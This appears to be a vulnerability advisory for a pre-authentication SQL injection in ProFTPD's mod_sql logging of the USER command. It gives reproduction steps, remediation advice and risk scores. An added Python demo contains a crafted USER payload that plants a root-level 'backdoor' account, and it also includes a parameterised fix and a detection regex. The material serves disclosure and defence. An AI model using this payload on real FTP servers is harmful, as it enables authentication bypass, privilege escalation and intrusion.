ProFTPD mod_sql SQL Injection Vulnerability Allowing Authentication Bypass, Privilege Escalation, and Remote Code Execution

Vulnerability

A SQL injection vulnerability has been identified in the mod_sql module of ProFTPD versions prior to 1.3.10rc1. It allows a remote client to execute arbitrary SQL statements through the module's SQL logging mechanism. The flaw is triggered when logging for the 'USER' command runs a query that interpolates attacker-controlled variables, such as the username supplied by the client, into the SQL text without escaping, and the SQL backend accepts the statements that result. Because 'USER' is the first command a client sends, the injection is reachable before any credentials are checked. An attacker can use it to insert a backdoor account into the authentication database that mod_sql reads, or, on backends such as PostgreSQL and SQLite that execute stacked queries, to run further statements, up to arbitrary code execution on the database host. Only deployments whose mod_sql configuration logs 'USER' with a query that embeds the username are exposed; the configuration that creates this condition is described under Reproduction.

Impact

Exploitation yields pre-authentication SQL injection against the database that mod_sql uses for authentication. Depending on the backend and on the privileges of the database account ProFTPD connects with, this allows authentication bypass and privilege escalation (for example, a planted account with attacker-chosen UID, GID and home directory) and remote code execution on the database host.

Reproduction

To reproduce, configure mod_sql to run a logging query when the 'USER' command is received: an 'SQLLog' directive for USER bound to an 'SQLNamedQuery' whose SQL interpolates '%U' (the original username as sent by the client) directly into the statement, with no escaping. Then connect and send a 'USER' command whose argument closes the quoted literal and appends further SQL; on a backend that executes stacked queries, the appended statements run. A proof-of-concept script that automates this is published in the 'proftpd-CVE-2026-42167-poc' GitHub repository.

Remediation

Users are advised to upgrade to ProFTPD 1.3.10 or later (the fix is present from 1.3.10rc1, which is why earlier releases are listed as affected). Where an immediate upgrade is not possible, two stopgaps reduce exposure: remove the username variables from any query that 'SQLLog' runs for 'USER', or add a 'mod_rewrite' configuration that rewrites or rejects 'USER' arguments containing the characters used to break out of a quoted literal or chain statements (quotes, semicolons, backslashes and comment sequences such as '--'). The filter is only a mitigation: it has to match the quoting and comment syntax of the specific backend, and it does not remove the unescaped interpolation itself, so the upgrade remains necessary.
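The following Python script is an added illustration of the flaw described in the Vulnerability and Reproduction sections and of the character filter suggested above; it is not code from ProFTPD, from the advisory, or from the proof-of-concept repository. It models the vulnerable behaviour (a logging template with '%U' spliced in verbatim, executed on a backend that runs stacked statements) against an in-memory SQLite database with a constructed schema, shows the same crafted 'USER' argument being stored harmlessly when the username is bound as a parameter, and applies the kind of character check a mod_rewrite stopgap would perform. The table names, column names, the 'LOG_QUERY' template, the 'PAYLOAD' string and the '_SUSPICIOUS' character set are all assumptions made for the example.

```python
import re
import sqlite3

# Constructed stand-in for a mod_sql deployment: a users table that mod_sql
# authenticates against and a log table that an SQLLog USER query writes to.
# Table and column names are assumptions, not ProFTPD defaults.
SCHEMA = """
CREATE TABLE users (
    userid  TEXT PRIMARY KEY,
    passwd  TEXT,
    uid     INTEGER,
    gid     INTEGER,
    homedir TEXT,
    shell   TEXT
);
CREATE TABLE ftplog (user TEXT, cmd TEXT);
INSERT INTO users VALUES ('alice', 'hash-of-alices-password', 1001, 1001,
                          '/home/alice', '/sbin/nologin');
"""

# Hypothetical logging query of the kind the advisory describes: the original
# username (%U) is spliced into the SQL text with no escaping.
LOG_QUERY = "INSERT INTO ftplog (user, cmd) VALUES ('%U', 'USER')"


def render_unescaped(template: str, username: str) -> str:
    """Model the vulnerable substitution: %U is replaced verbatim."""
    return template.replace("%U", username)


def log_user_vulnerable(conn: sqlite3.Connection, username: str) -> None:
    """Run the rendered query on a backend that accepts stacked statements.

    executescript() executes every ';'-separated statement, which is the
    backend property that turns the injection into writes to other tables.
    """
    conn.executescript(render_unescaped(LOG_QUERY, username))


def log_user_hardened(conn: sqlite3.Connection, username: str) -> None:
    """Safe form: the username travels as a bound parameter, never as SQL."""
    conn.execute("INSERT INTO ftplog (user, cmd) VALUES (?, 'USER')", (username,))


# Characters and sequences that a username should never need but that are
# required to leave a quoted literal or to chain or comment out SQL. This is
# the check a mod_rewrite stopgap would apply; the set is an assumption.
_SUSPICIOUS = re.compile(r"""['";\\#]|--|/\*""")


def suspicious_username(username: str) -> bool:
    return _SUSPICIOUS.search(username) is not None


# Crafted USER argument (constructed). The first fragment closes the log
# INSERT, the second plants a backdoor account, and the third re-opens a
# quoted literal so the template's trailing "', 'USER')" still parses.
PAYLOAD = (
    "evil', 'USER'); "
    "INSERT INTO users VALUES ('backdoor', 'letmein', 0, 0, '/', '/bin/sh'); "
    "INSERT INTO ftplog (user, cmd) VALUES ('evil"
)


def fresh_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def user_ids(conn: sqlite3.Connection) -> list:
    return [row[0] for row in conn.execute("SELECT userid FROM users ORDER BY userid")]


def demo_vulnerable() -> list:
    """Return the user table after one crafted USER command on the unescaped path."""
    conn = fresh_db()
    log_user_vulnerable(conn, PAYLOAD)
    return user_ids(conn)


def demo_hardened() -> tuple:
    """Return (user table, logged username) when the query is parameterised."""
    conn = fresh_db()
    log_user_hardened(conn, PAYLOAD)
    logged = conn.execute("SELECT user FROM ftplog").fetchone()[0]
    return user_ids(conn), logged


if __name__ == "__main__":
    print("vulnerable:", demo_vulnerable())   # ['alice', 'backdoor']
    print("hardened:  ", demo_hardened()[0])  # ['alice']
    print("filtered:  ", suspicious_username(PAYLOAD), suspicious_username("alice"))
```

The payload deliberately avoids a trailing comment marker and instead re-opens a string literal so that the whole rendered text is syntactically complete on every backend; a comment-terminated variant works equally well on backends whose comment syntax is known. The parameterised form is shown as the generic safe pattern and is not a description of the change ProFTPD shipped in 1.3.10rc1.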

Added: Apr 28, 2026, 11:37 PM
Updated: Apr 28, 2026, 11:37 PM

Vulnerability Rating

Custom Algorithm
spread: 6.4
impact: 10.0
exploitability: 9.3
remediation: 8.3
relevance: 6.9
threat: 6.5
urgency: 2.9
incentive: 8.3

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.